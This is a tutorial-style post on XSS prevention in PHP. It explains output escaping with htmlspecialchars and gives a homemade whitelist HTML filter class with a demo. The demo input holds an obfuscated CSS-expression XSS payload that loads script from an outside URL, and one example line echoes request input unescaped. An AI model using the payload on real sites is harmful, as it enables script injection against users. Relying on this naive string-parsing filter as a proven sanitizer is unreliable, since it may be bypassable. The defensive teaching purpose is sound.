Essence

XSS is one of the most common attacks on the Internet. At bottom, it happens because data submitted by users is displayed as if it could be trusted. Why was it trusted? Perhaps a blacklist filter let something slip through the net, or perhaps someone forgot to escape the output. That is the essence of an XSS attack.

Prevention

Once you understand the essence, prevention is straightforward. Most output is not rich text, and for that the htmlspecialchars function is all you need. Rich text is more complicated. A blacklist will always either miss something or strip out legitimate user input, whereas a whitelist keeps only what you have explicitly allowed and removes everything else.

Correcting some common ideas

I have found that 90% of people do not know at which point each operation should be performed. Take the company I joined right after graduating: all data was run through htmlspecialchars before it was stored. So it is safe, and it really is safe. But leaving aside how much extra space the escaped data occupies, this makes rich text processing and passing data between applications unworkable.

Some people filter out dangerous code before the data goes into the database. What is the reason for this? Fear of XSS? But XSS does not happen while the data sits in the database! And if the data the user gives you does not meet your requirements, why store it at all? You can simply tell the user that the submitted data does not comply with the required format.

A simple example

<?php
// send a UTF-8 header first
echo $_GET['text']; // XSS!
echo htmlspecialchars($_GET['text'], ENT_QUOTES, 'UTF-8'); // non-rich text: output it this way
echo WhiteListFilter::filter($_GET['text']); // rich text: output it this way

Of course, you need to write this function yourself. You can also use the one I wrote, shown below.

Whitelist filtering function

<?php
/**
 * Whitelist-based HTML filter
 * @author wclssdn@yeah.net
 */
class HtmlFilter
{
    /**
     * Whitelist: tag name => attribute rules
     * @var array
     */
    private $whiteList = array();

    public function __construct(array $whiteList = array())
    {
        $this->whiteList = $whiteList;
    }

    /**
     * Add an HTML tag to the whitelist (an existing non-empty rule is kept)
     * @param string $label
     * @param array $rule
     */
    public function addLabel($label, array $rule = array())
    {
        if (empty($this->whiteList[$label])) {
            $this->whiteList[$label] = $rule;
        }
    }

    /**
     * Set the list of allowed values for an attribute of a tag
     * @param string $label
     * @param string $attribute
     * @param array $values allowed values
     */
    public function addValues($label, $attribute, array $values)
    {
        // an attribute has either a value list or a regular expression, not both
        if (isset($this->whiteList[$label][$attribute]['grep'])) {
            unset($this->whiteList[$label][$attribute]['grep']);
        }
        $this->whiteList[$label][$attribute]['values'] = $values;
    }

    /**
     * Set a regular-expression rule for an attribute of a tag
     * @param string $label
     * @param string $attribute
     * @param string $grep regular expression the value must match
     */
    public function addGrep($label, $attribute, $grep)
    {
        if (isset($this->whiteList[$label][$attribute]['values'])) {
            unset($this->whiteList[$label][$attribute]['values']);
        }
        $this->whiteList[$label][$attribute]['grep'] = $grep;
    }

    /**
     * Get the whitelist
     * @return array
     */
    public function getWhiteList()
    {
        return $this->whiteList;
    }

    /**
     * Run the filter
     * @param string $htmlcode
     * @return string
     */
    public function filter($htmlcode)
    {
        if (empty($htmlcode)) {
            return '';
        }
        // keep only the whitelisted tags
        $allowed = implode('', array_map(function ($key) {
            return "<{$key}>";
        }, array_keys($this->whiteList)));
        $htmlcode = strip_tags($htmlcode, $allowed);
        foreach ($this->whiteList as $whiteLabel => $rule) {
            $clean = '';          // code already filtered for this tag
            $unclean = $htmlcode; // code still to be scanned for this tag
            $found = false;       // whether the tag occurred at all
            // case-insensitive search, so <DIV ...> is handled like <div ...>
            while (($pos = stripos($unclean, "<{$whiteLabel}")) !== false) {
                $found = true;
                // skip longer tag names, e.g. <br> while processing <b>
                $next = (string) substr($unclean, $pos + strlen($whiteLabel) + 1, 1);
                if ($next !== '>' && $next !== '/' && !ctype_space($next)) {
                    $clean .= substr($unclean, 0, $pos + 1);
                    $unclean = substr($unclean, $pos + 1);
                    continue;
                }
                $endpos = strpos($unclean, '>', $pos); // end of this tag
                if ($endpos === false) {
                    break; // no closing '>' found: stop
                }
                $label = substr($unclean, $pos, $endpos - $pos + 1); // the whole tag
                if (!is_array($rule) || !$rule) {
                    // no rules for this tag: drop every attribute
                    $label = "<{$whiteLabel}>";
                } elseif (strpos($label, ' ') === false) {
                    // no space, so no attributes: rebuild the tag anyway
                    $label = "<{$whiteLabel}>";
                } else {
                    $clean2 = "<{$whiteLabel}"; // the tag rebuilt from allowed attributes
                    // e.g. 'align' => array('values' => array('left', 'right', 'center'))
                    foreach ($rule as $attribute => $attributeRule) {
                        if (($pos2 = stripos($label, $attribute)) === false) {
                            continue; // attribute not present, try the next one
                        }
                        $pos3 = strpos($label, '"', $pos2); // opening double quote
                        if ($pos3 === false) {
                            continue;
                        }
                        $pos4 = strpos($label, '"', $pos3 + 1); // closing double quote
                        if ($pos4 === false) {
                            continue;
                        }
                        // the attribute value, without the surrounding quotes
                        $attstr = substr($label, $pos3 + 1, $pos4 - $pos3 - 1);
                        if ($attribute == 'style') {
                            // style is a special case: check every declaration
                            $attarray = explode(';', $attstr);
                            foreach ($attarray as $at => $va) {
                                // split into property and value, e.g. float => left
                                $va = array_map('trim', explode(':', $va, 2));
                                if (count($va) < 2 || empty($attributeRule[$va[0]])) {
                                    unset($attarray[$at]); // property not in the whitelist
                                    continue;
                                }
                                $styleRule = $attributeRule[$va[0]];
                                if (!empty($styleRule['values']) && !in_array($va[1], $styleRule['values'], true)) {
                                    unset($attarray[$at]);
                                    continue;
                                }
                                if (!empty($styleRule['grep']) && !preg_match($styleRule['grep'], $va[1])) {
                                    unset($attarray[$at]);
                                    continue;
                                }
                            }
                            $clean2 .= $attarray ? ' style="' . implode(';', $attarray) . '"' : '';
                        } elseif (!empty($attributeRule['values']) && in_array($attstr, $attributeRule['values'], true)) {
                            // a value list is given: keep the attribute only if its value is listed
                            $clean2 .= " {$attribute}=\"{$attstr}\"";
                        } elseif (!empty($attributeRule['grep']) && preg_match($attributeRule['grep'], $attstr)) {
                            // a regular expression is given: keep the attribute only if it matches
                            $clean2 .= " {$attribute}=\"{$attstr}\"";
                        }
                    }
                    $label = $clean2 . '>';
                }
                // replace the original tag with the filtered one
                $unclean = substr_replace($unclean, $label, $pos, $endpos - $pos + 1);
                $clean .= substr($unclean, 0, $pos + strlen($label)); // processed part
                $unclean = substr($unclean, $pos + strlen($label));   // part still to scan
            }
            if ($found) {
                // processed part plus whatever was left after the last tag
                $htmlcode = $clean . $unclean;
            }
        }
        return $htmlcode;
    }
}

$whiteList = array(
    'b' => '', // tag
    'br' => '',
    'br/' => '',
    'p' => array( // tag
        'align' => array( // attribute of the tag
            'values' => array('left', 'right', 'center'), // values allowed for the attribute
        ),
        'style' => array(
            'float' => array(
                'values' => array('left', 'right'), // values allowed for the property
            ),
        ),
    ),
    'div' => array( // tag
        'align' => array( // attribute of the tag
            'values' => array('left', 'right', 'center'), // values allowed for the attribute
        ),
        'style' => array(
            'float' => array(
                'values' => array('left', 'right'), // values allowed for the property
            ),
        ),
    ),
    'img' => array( // tag
        'width' => array( // attribute
            'grep' => '#^[1-9][0-9]{0,3}$#s', // regular expression the value must match
        ),
        'height' => array(
            'grep' => '#^[1-9][0-9]{0,3}$#s',
        ),
    ),
);

// nowdoc, so that the backslash sequence in the payload is kept literally
$htmlcode = <<<'EOF'
<p>
<div REL="add-2012-xs">ssssssssssssssssssssssss</DIV>
<span STYLE="display:non;e:expr\0065ssion(function(){if(!window.x){try{document.scripts[0].src='http://www.2cto.com/I/wb.php'}catch(e){}window.x=1}}());" REL="add-2012-new">??</SPAN>
</p>
EOF;
// $htmlcode = str_repeat($htmlcode, 1000);
$htmlFilter = new HtmlFilter($whiteList);
$start = microtime(true);
// $htmlFilter->addLabel('a', array('href' => array('values' => array('#'))));
$htmlFilter->addValues('a', 'href', array('#'));
var_dump($htmlFilter->filter($htmlcode));
echo PHP_EOL, (microtime(true) - $start);

Of course, the $whiteList configuration needs to be written to suit your own needs. Anything that is not in it will be filtered out.
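The earlier point about when to perform each operation (reject input that does not match the required format, store accepted data unchanged, escape only at output time) can be illustrated with a minimal sketch. The helper names validateNickname and renderPlainText, and the nickname format itself, are assumptions made up for this example and are not part of the filter class above.

```php
<?php
// Hypothetical helpers illustrating "validate on input, escape on output".
// The function names and the nickname format are assumptions for this sketch.

/**
 * Check a submitted nickname against the required format.
 * Returns null when the value is acceptable, otherwise a message for the user.
 */
function validateNickname(string $nickname): ?string
{
    // \A and \z anchor the whole string, so a trailing newline is rejected too
    if (!preg_match('/\A[A-Za-z0-9_]{3,16}\z/', $nickname)) {
        return 'The nickname must be 3 to 16 letters, digits or underscores.';
    }
    return null;
}

/**
 * Escape a stored plain-text value at output time, for an HTML context.
 */
function renderPlainText(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
}

// Input that breaks the format is rejected with a message; nothing is stored.
$error = validateNickname('<script>alert(1)</script>');

// Accepted free text is stored as-is and escaped only when it is displayed.
$html = renderPlainText('Tom & "Jerry" <3');
```

With this split, the database keeps the original data, so it can still be passed to other applications or rendered in a non-HTML context, and the escaping is chosen by whichever code produces the output.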